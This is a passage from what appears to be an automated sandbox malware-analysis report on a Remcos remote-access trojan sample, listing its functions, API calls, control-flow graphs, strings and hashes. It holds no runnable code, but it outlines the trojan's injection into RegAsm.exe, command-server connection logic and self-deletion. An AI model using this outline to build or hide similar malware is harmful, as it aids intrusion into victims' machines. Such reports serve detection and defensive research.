                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                              • API String ID: 4236061018-3687161714
                                                                                              • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                              • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                              • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                              • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                                                              Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                              • ExitProcess.KERNEL32 ref: 0040F905
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                              • String ID: 5.1.1 Pro$override$pth_unenc
                                                                                              • API String ID: 2281282204-2344886030
                                                                                              • Opcode ID: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                                                              • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                              • Opcode Fuzzy Hash: 3fa15e960bbc6a4ad227c554a9012a3cdb08db0b8ab9406bce24a23a70318cf6
                                                                                              • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                              Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00594CC0), ref: 004338DA
                                                                                              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                              • String ID:
                                                                                              • API String ID: 1815803762-0
                                                                                              • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                              • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                              • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                              • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                              Function 004489D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                              Strings
                                                                                              • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Time$FileSystem
                                                                                              • String ID: GetSystemTimePreciseAsFileTime
                                                                                              • API String ID: 2086374402-595813830
                                                                                              • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                              • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                              • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                              • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                              Function 0041B69E Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                              • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                              • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                              • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                              Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: recv
                                                                                              • String ID:
                                                                                              • API String ID: 1507349165-0
                                                                                              • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                              • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                              • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                              • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                              Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                              • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                              • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 0040EA00 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 48 40ef2d-40ef3e call 401fd8 22->48 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 98 40ec27-40ec3d call 401fab call 4139e4 80->98 90 40ec47-40ec49 81->90 91 40ec4e-40ec55 81->91 94 40ef2c 90->94 95 40ec57 91->95 96 40ec59-40ec65 call 41b354 91->96 94->48 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 98->81 123 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->123 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 129 40ecc6 call 407790 107->129 130 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->130 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 141 40ec9c-40eca2 120->141 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 123->157 129->130 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 130->177 178 40edbb-40edbf 130->178 141->107 144 40eca4-40ecaa 141->144 144->107 147 40ecac call 40729b 144->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 192 40ee59-40ee7d call 40247c call 434829 184->192 185->192 213 40ee8c 192->213 214 40ee7f-40ee8a call 436f10 192->214 205->178 216 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 213->216 214->216 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 216->273 286 40f017-40f019 236->286 287 40effc 236->287 273->236 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->288 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->236 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 380 40f255-40f279 call 41b69e call 401f13 call 401f09 368->380 381 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->381 369->368 400 40f27b-40f27c SetProcessDEPPolicy 380->400 401 40f27e-40f291 CreateThread 380->401 381->380 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 428 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->428 443 40f381-40f386 DeleteFileW 428->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->123 445->123 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                              APIs
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                                • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                              • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                              • API String ID: 2830904901-3701325316
                                                                                              • Opcode ID: e37af304a9fd979769b8078b14c762969c90b96c3f499a7277212cde09c968c1
                                                                                              • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                              • Opcode Fuzzy Hash: e37af304a9fd979769b8078b14c762969c90b96c3f499a7277212cde09c968c1
                                                                                              • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                                                              Function 00414F65 Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-4151d2 WSAGetLastError call 41cb72 533->561 566 415220-415246 call 402093 * 2 call 41b580 560->566 567 41524b-415259 call 404f51 call 4048c8 560->567 565 4151d7-41520b call 4052fd call 402093 call 41b580 call 401fd8 561->565 583 415ade-415af0 call 404e26 call 4021fa 565->583 566->583 578 41525e-415260 567->578 582 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 578->582 578->583 648 4153bb-4153c8 call 405aa6 582->648 649 4153cd-4153f4 call 401fab call 4135e1 582->649 597 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 583->597 598 415b18-415b20 call 401e8d 583->598 597->598 598->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-415a51 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->656 655->656 902 415a53-415a5a 656->902 903 415a65-415a6c 656->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->583
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                              • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                                              • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                                              • API String ID: 524882891-3007660392
                                                                                              • Opcode ID: fdeabd913f89194a972c5f7ff524d0e6607fcd0e296ccc97aedf736c28b4093d
                                                                                              • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                              • Opcode Fuzzy Hash: fdeabd913f89194a972c5f7ff524d0e6607fcd0e296ccc97aedf736c28b4093d
                                                                                              • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                                                              Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 925 414dc1-414dfd 926 414e03-414e18 GetSystemDirectoryA 925->926 927 414f18-414f23 925->927 928 414f0e 926->928 929 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 926->929 928->927 934 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 929->934 935 414e6c-414e76 GetProcAddress 929->935 948 414f0a-414f0d 934->948 949 414ebd-414ec7 GetProcAddress 934->949 936 414e78-414e7b FreeLibrary 935->936 937 414e7d-414e7f 935->937 936->937 937->934 939 414ed2 937->939 941 414ed4-414ee5 GetProcAddress 939->941 943 414ee7-414eeb 941->943 944 414eef-414ef2 FreeLibrary 941->944 943->941 946 414eed 943->946 947 414ef4-414ef6 944->947 946->947 947->948 950 414ef8-414f08 947->950 948->928 951 414ec9-414ecc FreeLibrary 949->951 952 414ece-414ed0 949->952 950->948 950->950 951->952 952->939 952->948
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                              • API String ID: 2490988753-744132762
                                                                                              • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                              • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                              • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                              • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                                              Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • connect.WS2_32(?,?,?), ref: 004048E0
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                              • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                              • API String ID: 994465650-2151626615
                                                                                              • Opcode ID: 1f2a59b67e7ec9f08a81800e0f1a4bfe07729ac7d8df955aa20f2323d6d34b4f
                                                                                              • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                              • Opcode Fuzzy Hash: 1f2a59b67e7ec9f08a81800e0f1a4bfe07729ac7d8df955aa20f2323d6d34b4f
                                                                                              • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                                                              Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
